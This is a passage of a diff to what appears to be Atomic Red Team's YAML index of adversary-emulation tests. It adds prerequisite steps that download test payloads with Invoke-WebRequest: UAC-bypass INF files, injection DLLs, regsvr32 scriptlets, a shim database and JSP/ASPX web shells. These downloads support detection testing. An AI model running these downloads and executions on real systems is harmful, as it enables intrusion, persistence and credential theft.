"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1191/src/T1191_uacbypass.inf" -OutFile "#{inf_file_uac}" executor: name: command_prompt elevation_required: false @@ -6151,11 +6202,18 @@ defense-evasion: input_file: description: C# code that launches calc.exe from a hidden cmd.exe Window type: file - default: "$PathToAtomicsFolder\\T1500\\src\\calc.cs" + default: PathToAtomicsFolder\T1500\src\calc.cs output_file: description: Output compiled binary type: file default: C:\Windows\Temp\T1500.exe + dependency_executor_name: powershell + dependencies: + - description: C# file must exist on disk at specified location (#{input_file}) + prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1500/src/calc.cs" -OutFile "#{input_file}" executor: name: command_prompt elevation_required: false @@ -6239,6 +6297,13 @@ defense-evasion: description: Local .chm payload type: path default: PathToAtomicsFolder\T1223\src\T1223.chm + dependency_executor_name: powershell + dependencies: + - description: The payload must exist on disk at specified location (#{local_chm_file}) + prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1223/src/T1223.chm" -OutFile "#{local_chm_file}" executor: name: command_prompt elevation_required: false @@ -6457,6 +6522,13 @@ defense-evasion: description: path to cpl file type: path default: PathToAtomicsFolder\T1196\bin\calc.cpl + dependency_executor_name: powershell + dependencies: + - description: Cpl file must exist on disk at specified location (#{cpl_file_path}) + prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1196/bin/calc.cpl" -OutFile "#{cpl_file_path}" executor: name: command_prompt elevation_required: false @@ -9063,6 +9135,13 @@ defense-evasion: description: location of the source code to compile type: Path default: PathToAtomicsFolder\T1118\src\T1118.cs + dependency_executor_name: powershell + dependencies: + - description: Source code must exist on disk at specified location (#{source}) + prereq_command: 'if (Test-Path #{source}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{source}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/T1118.cs" -OutFile "#{source}" executor: name: command_prompt elevation_required: false @@ -9084,6 +9163,13 @@ defense-evasion: description: location of the source code to compile type: Path default: PathToAtomicsFolder\T1118\src\T1118.cs + dependency_executor_name: powershell + dependencies: + - description: Source code must exist on disk at specified location (#{source}) + prereq_command: 'if (Test-Path #{source}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{source}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/T1118.cs" -OutFile "#{source}" executor: name: command_prompt elevation_required: false @@ -9357,11 +9443,18 @@ defense-evasion: inputfile: description: path of file to copy type: path - default: "$PathToAtomicsFolder\\T1036\\bin\\t1036.exe" + default: PathToAtomicsFolder\T1036\bin\t1036.exe outputfile: description: path of file to execute type: path default: ($env:TEMP + "\svchost.exe") + dependency_executor_name: powershell + dependencies: + - description: Exe file to copy must exist on disk at specified location (#{inputfile}) + prereq_command: 'if (Test-Path #{inputfile}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/t1036.exe" -OutFile "#{inputfile}" executor: name: powershell elevation_required: false @@ -10347,7 +10440,7 @@ defense-evasion: dll_path: description: Path of the dll to inject type: string - default: "$PathToAtomicsFolder\\T1502\\bin\\calc.dll" + default: PathToAtomicsFolder\T1502\bin\calc.dll dll_process_name: description: Name of the created process from the injected dll type: string @@ -10360,6 +10453,13 @@ defense-evasion: description: Name of the process to spawn type: string default: iexplore + dependency_executor_name: powershell + dependencies: + - description: DLL to inject must exist on disk at specified location (#{dll_path}) + prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1502/bin/calc.dll" -OutFile "#{dll_path}" executor: name: powershell elevation_required: false @@ -10695,6 +10795,13 @@ defense-evasion: description: PID of input_arguments type: Int default: "(get-process spoolsv).id" + dependency_executor_name: powershell + dependencies: + - description: Utility to inject must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}" executor: name: powershell elevation_required: true @@ -10869,6 +10976,14 @@ defense-evasion: description: Location of the CSharp source_file type: Path default: PathToAtomicsFolder\T1121\src\T1121.cs + dependency_executor_name: powershell + dependencies: + - description: The CSharp source file must exist on disk at specified location + (#{source_file}) + prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}" executor: name: command_prompt elevation_required: false @@ -10894,6 +11009,14 @@ defense-evasion: description: Location of the CSharp source_file type: Path default: PathToAtomicsFolder\T1121\src\T1121.cs + dependency_executor_name: powershell + dependencies: + - description: The CSharp source file must exist on disk at specified location + (#{source_file}) + prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}" executor: name: powershell elevation_required: false @@ -10988,6 +11111,13 @@ defense-evasion: description: Name of the local file, include path. type: Path default: PathToAtomicsFolder\T1117\RegSvr32.sct + dependency_executor_name: powershell + dependencies: + - description: Regsvr32.exe must exist on disk at specified location (#{filename}) + prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/RegSvr32.sct" -OutFile "#{filename}" executor: name: command_prompt elevation_required: false @@ -11024,6 +11154,14 @@ defense-evasion: description: Name of DLL to Execute, DLL Should export DllRegisterServer type: Path default: PathToAtomicsFolder\T1117\bin\AllTheThingsx86.dll + dependency_executor_name: powershell + dependencies: + - description: AllTheThingsx86.dll must exist on disk at specified location + (#{dll_name}) + prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" executor: name: command_prompt elevation_required: false @@ -11258,6 +11396,13 @@ defense-evasion: description: Local location of inf file type: string default: PathToAtomicsFolder\T1085\src\T1085.inf + dependency_executor_name: powershell + dependencies: + - description: Inf file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false @@ -11276,6 +11421,13 @@ defense-evasion: description: Local location of inf file type: string default: PathToAtomicsFolder\T1085\src\T1085.inf + dependency_executor_name: powershell + dependencies: + - description: Inf file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false @@ -11294,6 +11446,13 @@ defense-evasion: description: Local location of inf file type: string default: PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf + dependency_executor_name: powershell + dependencies: + - description: Inf file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false @@ -11313,6 +11472,13 @@ defense-evasion: description: Local location of inf file type: string default: PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf + dependency_executor_name: powershell + dependencies: + - description: Inf file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false @@ -11549,6 +11715,13 @@ defense-evasion: description: PID of process receiving injection type: string default: 1000 + dependency_executor_name: powershell + dependencies: + - description: T1218.dll must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: name: command_prompt elevation_required: true @@ -11584,6 +11757,13 @@ defense-evasion: description: DLL to execute type: Path default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + dependency_executor_name: powershell + dependencies: + - description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: name: command_prompt command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} @@ -11600,6 +11780,11 @@ defense-evasion: description: MSI file to execute type: Path default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi + dependency_executor_name: powershell + dependencies: + - description: T1218.msi must exist on disk at specified location (#{msi_payload}) + prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}' + get_prereq_command: Write-Host "You must provide your own MSI" executor: name: command_prompt command: 'msiexec.exe /q /i "#{msi_payload}" @@ -11634,6 +11819,13 @@ defense-evasion: description: DLL to execute type: Path default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + dependency_executor_name: powershell + dependencies: + - description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: name: command_prompt command: 'msiexec.exe /y "#{dll_payload}" @@ -11650,6 +11842,13 @@ defense-evasion: description: DLL to execute type: Path default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + dependency_executor_name: powershell + dependencies: + - description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: name: command_prompt command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} @@ -11667,6 +11866,13 @@ defense-evasion: description: Local location of inf file type: string default: PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf + dependency_executor_name: powershell + dependencies: + - description: INF file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false @@ -12189,6 +12395,13 @@ defense-evasion: description: Location of the project file type: Path default: PathToAtomicsFolder\T1127\src\T1127.csproj + dependency_executor_name: powershell + dependencies: + - description: Project file must exist on disk at specified location (#{filename}) + prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/T1127.csproj" -OutFile "#{filename}" executor: name: command_prompt elevation_required: false @@ -12396,6 +12609,18 @@ defense-evasion: description: Location of the test XSL script file on the local filesystem. type: Path default: PathToAtomicsFolder\T1220\src\msxslscript.xsl + dependency_executor_name: powershell + dependencies: + - description: XML file must exist on disk at specified location (#{xmlfile}) + prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" + - description: XSL file must exist on disk at specified location (#{xslfile}) + prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{xslfile}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" executor: name: command_prompt command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} @@ -12439,6 +12664,13 @@ defense-evasion: description: Location of the test XSL script file on the local filesystem. type: path default: PathToAtomicsFolder\T1220\src\wmicscript.xsl + dependency_executor_name: powershell + dependencies: + - description: XSL file must exist on disk at specified location (#{local_xsl_file}) + prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" executor: name: command_prompt command: 'wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file} @@ -13032,6 +13264,13 @@ privilege-escalation: description: Path to the shim databaase file type: String default: PathToAtomicsFolder\T1138\src\AtomicShimx86.sdb + dependency_executor_name: powershell + dependencies: + - description: Shim database file must exist on disk at specified location (#{file_path}) + prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1138/src/AtomicShimx86.sdb" -OutFile "#{file_path}" executor: name: command_prompt elevation_required: true @@ -13715,6 +13954,13 @@ privilege-escalation: description: TLS Server To Test Get Request type: Url default: https://www.example.com + dependency_executor_name: powershell + dependencies: + - description: T1179x64.dll must exist on disk at specified location (#{file_name}) + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll" -OutFile "#{file_name}" executor: name: powershell elevation_required: true @@ -14038,6 +14284,13 @@ privilege-escalation: description: Name of the Service type: String default: AtomicTestService + dependency_executor_name: powershell + dependencies: + - description: Service binary must exist on disk at specified location (#{binary_path}) + prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" executor: name: command_prompt elevation_required: true @@ -14062,6 +14315,13 @@ privilege-escalation: description: Name of the Service type: String default: AtomicTestService + dependency_executor_name: powershell + dependencies: + - description: Service binary must exist on disk at specified location (#{binary_path}) + prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" executor: name: powershell elevation_required: true @@ -14161,7 +14421,7 @@ privilege-escalation: dll_path: description: Path of the dll to inject type: string - default: "$PathToAtomicsFolder\\T1502\\bin\\calc.dll" + default: PathToAtomicsFolder\T1502\bin\calc.dll dll_process_name: description: Name of the created process from the injected dll type: string @@ -14174,6 +14434,13 @@ privilege-escalation: description: Name of the process to spawn type: string default: iexplore + dependency_executor_name: powershell + dependencies: + - description: DLL to inject must exist on disk at specified location (#{dll_path}) + prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1502/bin/calc.dll" -OutFile "#{dll_path}" executor: name: powershell elevation_required: false @@ -14531,6 +14798,13 @@ privilege-escalation: description: PID of input_arguments type: Int default: "(get-process spoolsv).id" + dependency_executor_name: powershell + dependencies: + - description: Utility to inject must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}" executor: name: powershell elevation_required: true @@ -15320,6 +15594,15 @@ privilege-escalation: description: Path of Web Shell type: path default: PathToAtomicsFolder\T1100\src\ + dependency_executor_name: powershell + dependencies: + - description: Web shell must exist on disk at specified location (#{web_shells}) + prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/b.jsp" -OutFile "#{web_shells}/b.jsp" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" executor: name: command_prompt command: 'xcopy #{web_shells} #{web_shell_path} @@ -16476,10 +16759,6 @@ discovery: supported_platforms: - windows input_arguments: - input_url: - description: URL to source code in Atomic-Red-Team git repository - type: Url - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs input_source_code: description: Path to source of C# code type: path @@ -16492,7 +16771,9 @@ discovery: dependencies: - description: T1010.cs must exist on disk at specified location (#{input_source_code}) prereq_command: 'if (Test-Path #{input_source_code}) {exit 0} else {exit 1}' - get_prereq_command: Invoke-WebRequest "#{input_URL}" -OutFile "#{input_source_code}" + get_prereq_command: |- + New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" executor: name: command_prompt elevation_required: false @@ -18441,7 +18722,9 @@ discovery: dependencies: - description: 'Test requires #{port_file} to exist' prereq_command: if (Test-Path "#{port_file}") {exit 0} else {exit 1} - get_prereq_command: Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" + get_prereq_command: |- + New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" executor: name: powershell elevation_required: false @@ -20180,6 +20463,13 @@ credential-access: description: TLS Server To Test Get Request type: Url default: https://www.example.com + dependency_executor_name: powershell + dependencies: + - description: T1179x64.dll must exist on disk at specified location (#{file_name}) + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll" -OutFile "#{file_name}" executor: name: powershell elevation_required: true @@ -20697,6 +20987,13 @@ credential-access: description: Path to DLL to be installed and registered type: Path default: PathToAtomicsFolder\T1174\src\AtomicPasswordFilter.dll + dependency_executor_name: powershell + dependencies: + - description: AtomicPasswordFilter.dll must exist on disk at specified location + (#{input_dll}) + prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}' + get_prereq_command: Write-Host "You must provide your own password filter + dll" executor: name: powershell elevation_required: true @@ -20988,6 +21285,13 @@ execution: description: Path to the INF file type: path default: PathToAtomicsFolder\T1191\src\T1191.inf + dependency_executor_name: powershell + dependencies: + - description: INF file must exist on disk at specified location (#{inf_file_path}) + prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1191/src/T1191.inf" -OutFile "#{inf_file_path}" executor: name: command_prompt elevation_required: false @@ -21006,6 +21310,13 @@ execution: description: Path to the INF file type: path default: PathToAtomicsFolder\T1191\src\T1191_uacbypass.inf + dependency_executor_name: powershell + dependencies: + - description: INF file must exist on disk at specified location (#{inf_file_uac}) + prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1191/src/T1191_uacbypass.inf" -OutFile "#{inf_file_uac}" executor: name: command_prompt elevation_required: false @@ -21144,6 +21455,13 @@ execution: description: Local .chm payload type: path default: PathToAtomicsFolder\T1223\src\T1223.chm + dependency_executor_name: powershell + dependencies: + - description: The payload must exist on disk at specified location (#{local_chm_file}) + prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1223/src/T1223.chm" -OutFile "#{local_chm_file}" executor: name: command_prompt elevation_required: false @@ -21313,6 +21631,13 @@ execution: description: path to cpl file type: path default: PathToAtomicsFolder\T1196\bin\calc.cpl + dependency_executor_name: powershell + dependencies: + - description: Cpl file must exist on disk at specified location (#{cpl_file_path}) + prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1196/bin/calc.cpl" -OutFile "#{cpl_file_path}" executor: name: command_prompt elevation_required: false @@ -21497,6 +21822,13 @@ execution: description: location of the source code to compile type: Path default: PathToAtomicsFolder\T1118\src\T1118.cs + dependency_executor_name: powershell + dependencies: + - description: Source code must exist on disk at specified location (#{source}) + prereq_command: 'if (Test-Path #{source}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{source}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/T1118.cs" -OutFile "#{source}" executor: name: command_prompt elevation_required: false @@ -21518,6 +21850,13 @@ execution: description: location of the source code to compile type: Path default: PathToAtomicsFolder\T1118\src\T1118.cs + dependency_executor_name: powershell + dependencies: + - description: Source code must exist on disk at specified location (#{source}) + prereq_command: 'if (Test-Path #{source}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{source}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/T1118.cs" -OutFile "#{source}" executor: name: command_prompt elevation_required: false @@ -22351,6 +22690,14 @@ execution: description: Location of the CSharp source_file type: Path default: PathToAtomicsFolder\T1121\src\T1121.cs + dependency_executor_name: powershell + dependencies: + - description: The CSharp source file must exist on disk at specified location + (#{source_file}) + prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}" executor: name: command_prompt elevation_required: false @@ -22376,6 +22723,14 @@ execution: description: Location of the CSharp source_file type: Path default: PathToAtomicsFolder\T1121\src\T1121.cs + dependency_executor_name: powershell + dependencies: + - description: The CSharp source file must exist on disk at specified location + (#{source_file}) + prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}" executor: name: powershell elevation_required: false @@ -22470,6 +22825,13 @@ execution: description: Name of the local file, include path. type: Path default: PathToAtomicsFolder\T1117\RegSvr32.sct + dependency_executor_name: powershell + dependencies: + - description: Regsvr32.exe must exist on disk at specified location (#{filename}) + prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/RegSvr32.sct" -OutFile "#{filename}" executor: name: command_prompt elevation_required: false @@ -22506,6 +22868,14 @@ execution: description: Name of DLL to Execute, DLL Should export DllRegisterServer type: Path default: PathToAtomicsFolder\T1117\bin\AllTheThingsx86.dll + dependency_executor_name: powershell + dependencies: + - description: AllTheThingsx86.dll must exist on disk at specified location + (#{dll_name}) + prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" executor: name: command_prompt elevation_required: false @@ -22619,6 +22989,13 @@ execution: description: Local location of inf file type: string default: PathToAtomicsFolder\T1085\src\T1085.inf + dependency_executor_name: powershell + dependencies: + - description: Inf file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false @@ -22637,6 +23014,13 @@ execution: description: Local location of inf file type: string default: PathToAtomicsFolder\T1085\src\T1085.inf + dependency_executor_name: powershell + dependencies: + - description: Inf file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false @@ -22655,6 +23039,13 @@ execution: description: Local location of inf file type: string default: PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf + dependency_executor_name: powershell + dependencies: + - description: Inf file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest 